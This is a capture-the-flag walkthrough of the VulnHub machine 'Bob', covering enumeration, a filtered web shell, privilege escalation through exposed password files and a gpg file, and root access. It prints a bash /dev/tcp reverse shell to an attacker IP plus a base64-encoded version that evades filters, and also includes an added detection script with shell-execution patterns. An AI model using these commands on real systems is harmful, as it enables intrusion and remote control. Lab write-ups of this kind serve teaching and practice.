VulnHub: Bob Walkthrough

Bob is another intentionally vulnerable machine on VulnHub, created by c0rruptedb1t.
Enumeration
Starting enumeration with AutoRecon.
Nmap scan report for 192.168.50.153
Host is up, received arp-response (0.0089s latency).
Scanned at 2022-01-02 19:33:41 EST for 8s
Not shown: 998 closed ports
Reason: 998 resets
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 64 ProFTPD 1.3.5b
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.25 ((Debian))
Only two ports are open. FTP doesn't allow anonymous login, so let's get started with port 80.
It is a website for a high school. We start by looking at all the pages and their source code.

On /news.html, we find a commented-out line with a string that looks interesting.

We used hashes.com to identify the encoding of the string. It is base64.
┌──(root💀kali)-[~]
└─# echo "SW4gb3RoZXIgbmV3cyBzb21lIGR1bWJhc3MgbWFkZSBhIGZpbGUgY2FsbGVkIHBhc3N3b3Jkcy5odG1sLCBjb21wbGV0ZWx5IGJyYWluZGVhZA0KDQotQm9i" | base64 -d
In other news some dumbass made a file called passwords.html, completely braindead
-Bob
We got the first hint: there is a /passwords.html file.

So, dirbusting should lead us to other files in the web root folder.
Before we do that, let's have a look at the other pages in the navigation bar too.
Logging in through /login.html has been disabled, but the source code has a hint.

Apparently, we are looking for a web shell too.
/robots.txt disallows four entries.
User-agent: *
Disallow: /login.php
Disallow: /dev_shell.php
Disallow: /lat_memo.html
Disallow: /passwords.html
/login.php was not found on the server.
/passwords.html is the one we found earlier.
/dev_shell.php contains a web shell.

/lat_memo.html is a memo from Bob saying that the filters in the web shell have been imported from the old Windows server to the Linux server that is now running.

Dirbusting turned up the same results.
Initial Foothold
The web shell we have is heavily filtered. We can try to get a reverse shell from it.
A command like the one below, which would normally give us a reverse TCP shell, does not work because various characters are filtered.
bash -i >& /dev/tcp/192.168.50.129/443 0>&1
So, we use another trick: the above command is converted to base64 and then decoded by the web shell itself.
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjUwLjEyOS80NDMgMD4mMQ== | base64 -d | bash
This sends the base64 string, decodes it on the target and pipes the result to bash, which executes the command.
We set up a listener on port 443 and receive a shell back.
┌──(root💀kali)-[~]
└─# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.50.129] from (UNKNOWN) [192.168.50.153] 52904
bash: cannot set terminal process group (610): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Milburg-High:/var/www/html$ whoami
whoami
www-data
We get a low-privileged shell as www-data.
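The decode-and-pipe trick used above is also a useful detection signal from the defender's side. The script below is an added example, not from the original walkthrough: it scans a constructed set of process command lines (SAMPLE_LOG is made up, with the walkthrough's encoded one-liner placed in one of them), decodes every base64-looking token and flags those whose plaintext contains a shell-execution indicator. The flag_encoded_exec and count_encoded_exec names are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the walkthrough): flag commands that hide a shell
# payload inside base64, the same trick used against the filtered web shell.
# SAMPLE_LOG is a constructed set of process command lines; the second one
# carries the reverse-shell one-liner from the walkthrough, base64-encoded.
SAMPLE_LOG='proctitle="echo aGVsbG8gd29ybGQ= | base64 -d"
proctitle="echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjUwLjEyOS80NDMgMD4mMQ== | base64 -d | bash"
proctitle="ls -la /var/www/html"'

# flag_encoded_exec LINE: decode every base64-looking token in LINE and print
# the ones whose plaintext contains a shell-execution indicator.
# Returns 0 if at least one token is suspicious, 1 otherwise.
flag_encoded_exec() {
    line=$1
    hit=1
    for tok in $(printf '%s\n' "$line" | grep -oE '[A-Za-z0-9+/]{12,}={0,2}' || true); do
        # tokens that are not valid base64 (e.g. a path such as /var/www/html) fail to decode: skip them
        dec=$(printf '%s' "$tok" | base64 -d 2>/dev/null) || continue
        [ -n "$dec" ] || continue
        case "$dec" in
            *'/dev/tcp/'*|*'bash -i'*|*'| bash'*|*'| sh'*|*'/bin/sh'*)
                printf 'SUSPICIOUS: %s -> %s\n' "$tok" "$dec"
                hit=0 ;;
        esac
    done
    return $hit
}

# count_encoded_exec LOG: number of lines in LOG that flag_encoded_exec flags.
count_encoded_exec() {
    printf '%s\n' "$1" | while IFS= read -r l; do
        flag_encoded_exec "$l" >/dev/null && echo hit
    done | wc -l | tr -d ' '
}

# Walk the constructed sample line by line and report what would be alerted on.
printf '%s\n' "$SAMPLE_LOG" | while IFS= read -r l; do
    flag_encoded_exec "$l" || true
done
echo "flagged lines: $(count_encoded_exec "$SAMPLE_LOG")"   # 1 for the sample above
```

The benign "hello world" line decodes cleanly but carries no execution indicator, so only the encoded reverse-shell line is reported.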
Privilege Escalation
Enumerating the box once again:
The home directories of all the users are accessible.
www-data@Milburg-High:/home$ ls
ls
bob
elliot
jc
seb
In Bob's home dir, we find an old password file with the passwords of two users:
www-data@Milburg-High:/home/bob$ cat .old_passwordfile.html
cat .old_passwordfile.html
<html>
<p>
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
</p>
</html>
In addition, we find a .gpg file; we take note of it and move on.
www-data@Milburg-High:/home/bob/Documents$ ls -la
ls -la
total 20
drwxr-xr-x 3 bob bob 4096 Mar 5 2018 Secret
-rw-r--r-- 1 bob bob 91 Mar 5 2018 login.txt.gpg
-rw-r--r-- 1 bob bob 300 Mar 4 2018 staff.txt
Nested deep in the Secret dir, we also find a shell script which could come in handy later.
<uments/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here$ cat notes.sh
cat notes.sh
#!/bin/bash
clear
echo "-= Notes =-"
echo "Harry Potter is my faviorite"
echo "Are you the real me?"
echo "Right, I'm ordering pizza this is going nowhere"
echo "People just don't get me"
echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>"
echo "Cucumber"
echo "Rest now your eyes are sleepy"
echo "Are you gonna stop reading this yet?"
echo "Time to fix the server"
echo "Everyone is annoying"
echo "Sticky notes gotta buy em"
jc's home dir is empty.
elliot's home dir has a file which confirms that jc's password is Qwerty and that elliot's password is theadminisdumb.
At this point, we have the passwords of all the users and could ssh into them.
Remember the .gpg file we came across? After some googling, it turns out to be an encrypted password file, and it sits in the home dir of bob, who also happens to be the admin.
The first letters of the lines echoed by the bash script (notes.sh) spell HARPOCRATES, which we can try as the passphrase to decrypt the gpg file.
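Recovering the acrostic mechanically, as an added example that is not part of the original walkthrough: the notes.sh content is embedded verbatim so the script runs offline, and the acrostic function name is an assumption of this example.

```shell
#!/bin/sh
# Added example: recover the passphrase hidden as an acrostic in notes.sh.
# NOTES is the script exactly as printed on the box, embedded here so this runs offline.
NOTES=$(cat <<'EOF'
#!/bin/bash
clear
echo "-= Notes =-"
echo "Harry Potter is my faviorite"
echo "Are you the real me?"
echo "Right, I'm ordering pizza this is going nowhere"
echo "People just don't get me"
echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>"
echo "Cucumber"
echo "Rest now your eyes are sleepy"
echo "Are you gonna stop reading this yet?"
echo "Time to fix the server"
echo "Everyone is annoying"
echo "Sticky notes gotta buy em"
EOF
)

# acrostic SCRIPT: print the first character of every quoted echo message,
# dropping the "-= Notes =-" banner because its first character is not a letter.
acrostic() {
    printf '%s\n' "$1" \
      | sed -n 's/^echo "\(.\).*/\1/p' \
      | grep '^[A-Za-z]' \
      | tr -d '\n'
}

acrostic "$NOTES"; echo   # HARPOCRATES
```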
www-data@Milburg-High:/home/bob/Documents$ gpg --batch --passphrase HARPOCRATES -d login.txt.gpg
gpg: keybox '/home/jc/.gnupg/pubring.kbx' created
gpg: AES encrypted data
gpg: encrypted with 1 passphrase
bob:b0bcat_
We get the password of bob which is b0bcat_.
Change the user to bob.
www-data@Milburg-High:/home/bob/Documents$ su bob
Password:
bob@Milburg-High:/home/bob/Documents$ whoami
bob
bob@Milburg-High:/home/bob/Documents$ sudo -i
root@Milburg-High:~#
We have a shell as bob, who is also an admin, and then use sudo -i to get root.
root@Milburg-High:~# cat flag.txt
hey n there flag.txt
And there's our root flag.